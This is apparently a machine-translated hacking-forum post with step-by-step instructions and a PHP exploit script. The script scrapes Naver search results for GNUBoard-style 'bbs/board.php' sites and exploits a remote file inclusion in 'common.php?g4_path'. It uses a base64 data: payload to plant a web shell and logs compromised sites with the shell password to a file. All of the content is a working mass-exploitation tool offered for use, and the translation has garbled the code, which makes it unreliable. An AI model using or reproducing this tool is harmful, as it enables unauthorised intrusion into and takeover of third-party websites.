From Hongke Network Security
1. Build a PHP environment on the local machine
2. Save the EXP Program
3. Run the command in CMD to execute php PTR. php.
A successful URL is recorded in akt.txt of 4..
5. http: // target URL/data/hardison. php password: akteam connected with PHP
EXP:
Copy the Code <? Php
Echo "+ ---------------------------------------------------------------- + ";
Echo "http://bbs.honkwin.com ";
Echo "+ ---------------------------------------------------------------- + ";
For ($ ii = 1; $ ii <= 99; $ ii ++)
{
$ C = (int) $ ii * 10 + 1;
$ A = "web.search.naver.com ";
$ B = "/search. naver? Where = webkr & query = bbs/board. php & xc = & docid = 0 & lang = all & st = s & fd = 2 & start = ". $ c. "& display = 10
& Qvt = 0 & sm = tab_pge ";
Get ($ a, $ B );
}
Function get ($ host, $ file)
{
$ Fp = fsockopen ($ host, 80, $ errno, $ errstr, 10 );
If (! $ Fp ){
Echo "SocketError: $ errstr ($ errno )";
Return false;
}
$ Get = "GET $ file HTTP/1.1 ";
$ Get. = "Host: $ host ";
$ Get. = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv: 1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 ";
$ Get. = "Referer: http: // $ host ";
$ Get. = "Connection: Close ";
$ Get. = "Cookie: ns_acl_nautocomplete = 1; NB = Beijing; NNB = AIUHYPM7OXJUS; page_uid = fOL9uloi5UNssbPX/M8sss -- 100532; _ naver_usersession _ = Beijing ";
Fwrite ($ fp, $ get );
$ Response = stream_get_contents ($ fp );
Preg_match_all ("(http: // [-w.] + (: d + )? (/([W/_.] *)? Bbs/board. php) ", $ response, $ put );
For ($ I = 0; $ I <count ($ put [0]); $ I ++)
{
$ A = (int) $ I * 3;
Fuck ($ put [0] [$ a]);
// Echo count ($ put [0]);
// Print_r ($ put [0]);
// Fuck ($ put [0] [$ I]);
Break;
}
Fclose ($ fp );
}
Function fuck ($ OK)
{
$ A = preg_replace (bbs/board. php), $ OK );
$ File = $ a. "common. php? G4_path =/tmp2345 ";
$ Xxx = $ a. "common. php? G4_path = data:; base64, PD9mcHV0cyhmb3BlbignLi9kYXRhL2hhcmRpc29uLnBocCcsJ3crJyksJzw/
Alias/Pg = ";
$ Shell = $ a. "data/akteam. php ";
$ Target = parse_url ($ OK );
$ Sitepath = $ target [host];
$ Xx = @ file_get_contents ($ file );
If (eregi ("(Warning)", $ xx) & eregi ("(tmp)", $ xx ))
{
Print $ sitepath. "Vulnerability yes "."";
@ File_get_contents ($ xxx );
$ Oksehll = @ file_get_contents ($ shell );
If (! Eregi ("/\ 02345)", $ xx ))
{
Print $ sitepath. "OK "."";
}
If (eregi ("(akteam)", $ oksehll ))
{
Print $ shell. "pass: akteam "."";
$ Axx = "". $ shell;
Mongoshadefopen(akt.txt, "a + ");
Fwrite ($ sh, $ axx );
Fclose ($ sh );
}
}
Else
{
Print $ sitepath. "Vulnerability no "."";
}
}
?>